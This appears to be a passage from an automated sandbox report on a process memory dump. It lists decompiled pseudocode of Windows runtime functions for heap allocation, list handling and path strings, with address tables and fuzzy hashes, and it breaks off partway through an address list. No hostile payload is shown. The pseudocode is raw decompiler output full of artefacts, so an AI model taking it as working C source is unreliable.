0x03608ae0
0x03608af1
0x00000000
0x03608af1
0x03608acd
0x03608ad5
0x03608afb
0x03608afd
0x03608aff
0x03608b07
0x03608b22
0x03608b24
0x03608b2a
0x03608b2e
0x03608b3f
0x03608b78
0x03608b41
0x03608b52
0x03608b54
0x03608b5c
0x03608b74
0x03608b74
0x03608b5c
0x03608b3f
0x03608b5e
0x03608b61
0x03608b64
0x03608b64
0x03608b6c
0x03608b6c
0x03608b11
0x03659cd5
0x03659cd5
0x03608b17
0x03608b1a
0x03608b1a
0x00000000
0x03608ad5
0x03608a89

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4b4ec9732f913d7550aca68b81296258cb398cd74aa422b9aa36e0c3cd0925
Instruction ID: 94b74416711e5b92766c709aef38b5055a03a2ae496d3208c84476a1169ae568
Opcode Fuzzy Hash: 7b4b4ec9732f913d7550aca68b81296258cb398cd74aa422b9aa36e0c3cd0925
Instruction Fuzzy Hash: B94174B5A4032C9BDB28DF59CD89AAAB7F8FB45300F1445E9D819A7391D7709E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 036BAA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036BAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E036BABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E036BAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E036BAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0369CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L036177F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E03617D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E036B131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0369CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x036baa1f
0x036baa21
0x036baa23
0x036baa2b
0x036baa30
0x036baa36
0x036baa39
0x036baa42
0x036baa75
0x036baa7a
0x036baa7c
0x036baa7c
0x036baa88
0x036baa8a
0x036baa8f
0x036bab02
0x036bab04
0x036baa99
0x036baaa8
0x036baaaf
0x036baab3
0x036baacc
0x036baad1
0x036baad6
0x036baae0
0x036baaf3
0x036baaf9
0x036baafe
0x036baafe
0x036baaf3
0x036baad6
0x036baab3
0x036bab07
0x036bab0a
0x036bab11
0x036bab23
0x036bab13
0x036bab1c
0x036bab1c
0x036bab2b
0x036bab44
0x036bab44
0x036bab51
0x036bab51
0x036baa44
0x036baa47
0x036baa4c
0x00000000
0x00000000
0x036baa5a
0x036baa64
0x036baa72
0x00000000
0x036baa66
0x036baa66
0x036baa68
0x036baa6a
0x00000000
0x036baa6a

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: bdfa07da7946f0a168b1c98cca6f791cb33f016f5768b399580862c0c1e2b8e7
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 3031E636F102446BDB15CBA9C955BEFF7BADF84210F09406DE825AB351DA74DD80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 036BFDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E036BFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E036BFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E036C0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03617D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E036B1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E036C2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E036BC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E036BDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03617D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E036BA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x036bfde7
0x036bfde8
0x036bfdec
0x036bfdee
0x036bfdf5
0x036bfdf7
0x036bfdfc
0x036bfe19
0x036bfe22
0x036bfe26
0x036bfec6
0x036bfecd
0x036bfed5
0x036bfee7
0x036bfed7
0x036bfee0
0x036bfee0
0x036bfeef
0x036bff00
0x036bff02
0x036bff07
0x036bff07
0x00000000
0x036bfeef
0x036bfe33
0x036bfe55
0x036bfe59
0x036bfe5b
0x036bfe5e
0x036bfe69
0x036bfe6d
0x036bfe6d
0x036bfe69
0x036bfe35
0x036bfe41
0x036bfe41
0x036bfe79
0x036bfe8b
0x036bfe7b
0x036bfe84
0x036bfe84
0x036bfe93
0x00000000
0x036bfea8
0x036bfeba
0x00000000
0x036bfeba
0x036bfdfe
0x036bfe01
0x036bfe02
0x036bfe08
0x036bff0c
0x036bff14
0x036bff14

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 2e7eb0c3dd39a1c7704995a92d25de4339064b0aec756766b76b12bb8fb8e254
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: E131F636200740BFD722DB78CD44FBABBB9EB85650F1C4459E4458F762DA74D882CB14

Uniqueness

Uniqueness Score: -1.00%

Function 036BEA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E036BEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03612280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E036BE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E035FF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0360FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E036BAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E036BBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03617D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E036AFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0360FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E036BA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x036bea55
0x036bea66
0x036bea68
0x036bea6c
0x036bea6f
0x036bea72
0x036bea75
0x036bea7a
0x036bea7a
0x036bea7e
0x036bea80
0x036bea85
0x036bea8b
0x036beab5
0x036beabc
0x036beabf
0x036beabf
0x036beaca
0x036beace
0x036bead0
0x036beae4
0x036beaeb
0x036beaf0
0x036beaf5
0x036beb09
0x036beb0d
0x036beb1d
0x036beb2d
0x036beb38
0x036beb3d
0x036beb41
0x036beb4a
0x036beb60
0x036beb4c
0x036beb52
0x036beb59
0x036beb59
0x036beb68
0x036beb71
0x036beb71
0x036bea8d
0x036bea8f
0x036bea92
0x036bea97
0x036bea97
0x036bea9b
0x036bea9c
0x036bea9e
0x036beaa6
0x036beaa6
0x036beb7e

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 53f1ef0d73fff8b8e76b123a4580357b9492565460e707b52b87b1dfdf83322b
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 4531D036604705AFC729DF24D980AABB7BAFFC0210F08492DF5528B780DE31E805CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 036769A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E036769A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x36ed360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03606C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03676BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03639980() >= 0) {
							E03612280(_t56, 0x36e8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x36e8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x36e8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E035FB6F0(0x35dc338, 0x35dc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03639520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E036395D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0360FFB0(_t68, _t77, 0x36e8778);
				}
				_pop(_t78);
				return E0363B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x036769b5
0x036769be
0x036769c3
0x036769c9
0x036769cc
0x036769d1
0x036769d3
0x036769de
0x036769e1
0x036769ea
0x036769f6
0x036769fe
0x03676a13
0x03676a14
0x03676a15
0x03676a16
0x03676a1e
0x03676a26
0x03676a31
0x03676a36
0x03676a37
0x03676a40
0x03676a49
0x03676a4a
0x03676a53
0x03676a59
0x03676a5d
0x03676a5e
0x03676a64
0x03676a67
0x03676a6a
0x03676a6d
0x03676a70
0x03676a77
0x03676a7d
0x03676a86
0x03676a89
0x03676a9c
0x03676a9f
0x03676aa2
0x03676aa5
0x03676aaf
0x03676ab1
0x03676ab8
0x03676ab9
0x03676abb
0x03676abe
0x03676ac5
0x03676ac5
0x03676aaf
0x03676a40
0x03676a26
0x036769fe
0x03676ace
0x03676ad0
0x03676ad3
0x03676ad8
0x03676adf
0x03676adf
0x03676ae8
0x03676aef
0x03676aef
0x03676af9
0x03676b06

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ac841c23bdb5a9a64797f4e2c12030f1bc3a67c4031df085bd39dcbc081ef2
Instruction ID: bc9165e0013c9a95bfedfcb57d4603655045f2fcf5ba2c69256b4c5b132e2b45
Opcode Fuzzy Hash: 18ac841c23bdb5a9a64797f4e2c12030f1bc3a67c4031df085bd39dcbc081ef2
Instruction Fuzzy Hash: A1417CB1E00708AFDB24DFA4D940BEEFBF8EF48714F08852AE815A7250DB709905CB54

Uniqueness

Uniqueness Score: -1.00%

Function 035F5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E035F5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E035F52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E036395D0();
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0360EB70(_t54, 0x36e79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E036395D0();
								L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0360EB70(_t54, 0x36e79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0363F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0360EB70(_t54, 0x36e79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E036395D0();
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x035f5220
0x035f5224
0x03650d13
0x03650d16
0x03650d19
0x035f522a
0x035f522a
0x035f522d
0x035f522d
0x035f5231
0x035f5235
0x035f5239
0x03650d5c
0x03650d62
0x00000000
0x00000000
0x03650d6a
0x03650d7b
0x03650d7f
0x03650d81
0x03650d84
0x03650d95
0x03650d95
0x03650d6c
0x03650d71
0x03650d71
0x03650d9a
0x00000000
0x035f524a
0x035f524a
0x035f5250
0x03650d24
0x03650d35
0x03650d39
0x03650d3b
0x03650d3e
0x03650d50
0x03650d50
0x03650d26
0x03650d2b
0x03650d2b
0x00000000
0x03650d55
0x035f5256
0x035f525b
0x035f5265
0x03650da7
0x035f526b
0x035f526e
0x035f5272
0x03650db1
0x03650db4
0x03650dc5
0x03650dc5
0x035f5272
0x035f5278
0x035f527e
0x035f528a
0x035f528c
0x035f528d
0x00000000
0x035f5280
0x035f5282
0x035f5288
0x035f529f
0x035f5292
0x00000000
0x035f5292
0x00000000
0x035f5288
0x035f527e

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5589d69ce50da651858c1147816222d36be3f51200dfa0dd33ce00f7ec76492a
Instruction ID: 4c1ca0030f478d1837119516c6fc0145840c3691644427c76a8d5080b8705b44
Opcode Fuzzy Hash: 5589d69ce50da651858c1147816222d36be3f51200dfa0dd33ce00f7ec76492a
Instruction Fuzzy Hash: 07310632642B10EFC726EB28DD81B66B7A5FF01760F154F29F9550F2A0EB70E840CA94

Uniqueness

Uniqueness Score: -1.00%

Function 0362A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0362A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x36d0220);
				E0364D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x36e7b9c; // 0x0
				_t55 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0364D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x36e7b10 =  *0x36e7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x36e536c; // 0xfa3bc8
					if( *_t51 != 0x36e5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x36e5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x36e536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0362A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0362a61c
0x0362a61e
0x0362a623
0x0362a628
0x0362a62b
0x0362a62d
0x0362a648
0x0362a64a
0x0362a64f
0x03669b44
0x0362a6ec
0x0362a6f1
0x0362a6f1
0x0362a655
0x0362a657
0x0362a65a
0x0362a65d
0x0362a662
0x0362a663
0x0362a667
0x0362a668
0x0362a66d
0x0362a706
0x0362a706
0x03669bda
0x03669be6
0x03669beb
0x00000000
0x03669beb
0x0362a679
0x03669b7a
0x00000000
0x03669b7a
0x0362a683
0x0362a6f4
0x0362a6f7
0x0362a6f9
0x0362a6fd
0x0362a6a0
0x0362a6a0
0x0362a6ad
0x0362a6af
0x0362a6b4
0x03669ba7
0x03669bac
0x00000000
0x00000000
0x03669bc6
0x03669bce
0x03669bd1
0x03669bd3
0x03669bd3
0x00000000
0x03669bd1
0x0362a6bd
0x0362a6c3
0x0362a6c6
0x0362a6d2
0x0362a701
0x0362a704
0x00000000
0x0362a704
0x0362a6d4
0x0362a6d6
0x0362a6d9
0x0362a6db
0x0362a6e1
0x0362a6e6
0x0362a6e8
0x0362a6e8
0x0362a6ea
0x00000000
0x0362a6ea
0x0362a688
0x0362a692
0x0362a694
0x0362a699
0x00000000
0x00000000
0x0362a69d
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f07e0853b33e6fa3da4d0e3cba14c3904a7a215619cbff669a930fd5e3b2f427
Instruction ID: 08274cebe1aabcb94c526fefb86cf4ed7a8da9e4519e88f85196ad2f1ad8e6f3
Opcode Fuzzy Hash: f07e0853b33e6fa3da4d0e3cba14c3904a7a215619cbff669a930fd5e3b2f427
Instruction Fuzzy Hash: B5417B79A00715DFCB05CF98C980B99BBF2BB49314F1980ADE904AF344DBB5A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03633D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03633D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03607B60(0, _t61, 0x35d11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03607B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03614620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x03633d4c
0x03633d50
0x03633d55
0x03633d5e
0x0366e79a
0x00000000
0x0366e79a
0x03633d68
0x0366e789
0x03633d9d
0x03633da3
0x03633daf
0x03633db5
0x03633dbc
0x03633dc4
0x03633dc9
0x03633dce
0x0366e7ae
0x0366e7ae
0x03633dde
0x03633de2
0x03633de7
0x03633e0d
